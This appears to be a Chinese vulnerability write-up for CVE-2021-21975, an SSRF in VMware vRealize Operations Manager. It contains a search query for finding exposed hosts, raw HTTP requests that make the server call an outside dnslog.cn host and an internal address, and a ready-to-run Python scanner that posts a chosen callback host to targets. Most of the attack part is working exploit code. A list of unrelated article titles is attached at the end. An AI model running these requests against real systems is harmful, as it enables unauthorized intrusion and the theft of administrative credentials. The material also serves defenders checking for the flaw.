一、漏洞描述

vRealize Operations Manager API包含服务器端请求伪造。可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF),以窃取管理凭据。

二、漏洞影响

vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0

cloud_foundation: 4.x 3.x

vRealize_suite_lifecycle_manager: 8.x

三、漏洞复现

title="vRealize Operations Manager"

访问登录页面如下

发送请求包如下

POST /casa/nodes/thumbprints HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Length: 24["eheeyd.dnslog.cn"]

POST /casa/nodes/thumbprints HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Length: 24["127.0.0.1:443/ui"]

四、漏洞POC


import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')print('+  \033[34m公众号  : PeiQi文库                                                   \033[0m')print('+  \033[34mVersion: VMware vRealize Operations Manager                         \033[0m')print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')print('+  \033[36mDnslog      >>> xxx.dnslog.com                                     \033[0m')print('+------------------------------------------')def POC_1(target_url, v):vuln_url = target_url + "/casa/nodes/thumbprints"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/json;charset=UTF-8"}data = '["{}"]'.format(Dnslog)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=10)if response.status_code == 200 :print("\033[32m[o] 目标 {} 可能存在SSRF漏洞,请检查 Dnslog 响应 \033[0m".format(target_url, vuln_url))else:print("\033[31m[x] 目标 {} 不存在漏洞 \033[0m".format(target_url))except Exception as e:print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))if __name__ == '__main__':title()target_url = str(input("\033[35mPlease input Attack Url\nUrl    >>> \033[0m"))Dnslog = str(input("\033[35mDnslog >>> \033[0m"))POC_1(target_url, Dnslog)

VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975、SSRF)相关推荐

  1. VMware vRealize Operations Manager的内部版本号(2145975)

    Purpose 本文是提供 vRealize Operations Manager 的内部版本号和版本信息. 有关最新信息,请访问 Build numbers and versions of VMwa ...

  2. VMware vRealize Operations Manager download

    前言 VMware vRealize Operations 可提供从应用到基础架构的自动驾驶式 IT 运维管理,以优化.规划及扩展 SDDC 和 VMware Cloud 部署,同时提供对多个公有云的 ...

  3. VMware vRealize Operations Manager Appliance Install

    前言 vRealize Operations Manager 提供跨物理.虚拟和云基础架构的智能运维管理以及从应用程序到存储的可见性.使用基本策略的自动化,操作团队实现关键过程的自动化并提高 IT 效 ...

  4. vrops vRealize Operations Manager 8云管平台部署与配置

    1.背景简介 vROPs是Vmware开发的,面向IT管理员的,集监控.分析.告警等多功能合一的管理平台. 它功能强大,不仅能整合运维自家的多个产品,如vSphere.vSAN.NSX等等,还有不少软 ...

  5. vRealize Operations Manager 安装部署

    vRealize Operations Manager 安装部署 https://www.pianshen.com/article/18041671988/ 前话:关于VROPS好不好用的问题,我只想 ...

  6. 4、vRealize Operations Manager 管理

    1.配置密码过期策略 通过web登录到vRealize Operations Manager管理页面 点击 系统管理–访问控制–密码策略,点击编辑 取消所有勾选项,点击确定 2.添加数据源 添加vCe ...

  7. 2、vRealize Operations Manager 安装

    vRealize Operations Manager 安装 在DNS上添加正反向解析记录(该步骤非必需) 登录vCenter Server ,开始导入OVF文件 输入虚拟机名称,选择一个数据中心,点 ...

  8. 1、vRealize Operations Manager 介绍

    vRealize Operations 提供跨物理.虚拟和云基础架构的智能运维管理以及从应用程序到存储的可见性.使用基本策略的自动化,操作团队实现关键过程的自动化并提高 IT 效率. 利用从系统资源( ...

  9. vRealize Operations Manager 仪表板示图

    前话:VROPS的最强功能之一,仪表板.VMware 运维超强图示工具,功能强大,参数繁多.本篇不多说,只上几个在用的仪表板图示. 重负载VM仪表板关系图 重负载VM仪表板展示图 运维概览仪表板关系图 ...

最新文章

  1. 《深入理解计算机系统》读书随笔-位操作
  2. premiere pr 把切开的视频合并起来
  3. mysql如何插入新的字段_Mysql 如何 得到新插入的字段ID
  4. win10关闭“Windows安全中心”功能的两种方法
  5. c 子类对象 访问父类对象受保护成员_java面向对象总结
  6. R 梯度提升算法①
  7. jstat查看JVM的GC情况
  8. OpenCV中ROI
  9. 淘宝面试常见问题的答案来了,你看了吗?(一面及答案)
  10. 汽车故障诊断技术【2】
  11. StretchDIBits速度测试(COLORONCOLOR)
  12. python计算无穷级数求和常用公式_[python][计算方法]利用无穷级数计算幂运算(开根号)...
  13. 手把手教你爬取并下载英雄联盟所有英雄皮肤高清大图
  14. Git 单文件上传大小限制
  15. 男士黑色手表的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告
  16. python一元线性回归算法,代码及参数更新动图展示
  17. 漫威系列-《复联4》
  18. Gitlab修改文件上传10M大小限制
  19. 高中数学向量巨难题型四心问题解题技巧
  20. 中南大学上机:PIPI的DNA序列

热门文章

  1. linux系统c++编译连接过程,动态库与静态库
  2. 小波阈值去噪原理及实现
  3. 岗位多多,招聘 23人 | 中国农业科学院深圳农业基因组研究所诚聘博士后和科研人员...
  4. Nature子刊:是穷是富与基因有关?大数据分析发现149个与收入相关基因位点
  5. 生信分析过程中这些常见文件的格式以及查看方式你都知道吗?
  6. python爬取商城数据_Python爬取新版CRMEB小程序商城后台订单数据,保存为excel
  7. 学什么c语言标准,C语言的标准 “输入输出”!今天是你学C语言的第几天?
  8. 数仓dw怎么建_从0建设离线数据仓库
  9. python优雅编程_Python优雅编程——Collections模块中的高性能数据类型
  10. Spring Boot笔记-mysql5.7使用@Table后提示doesn't exist问题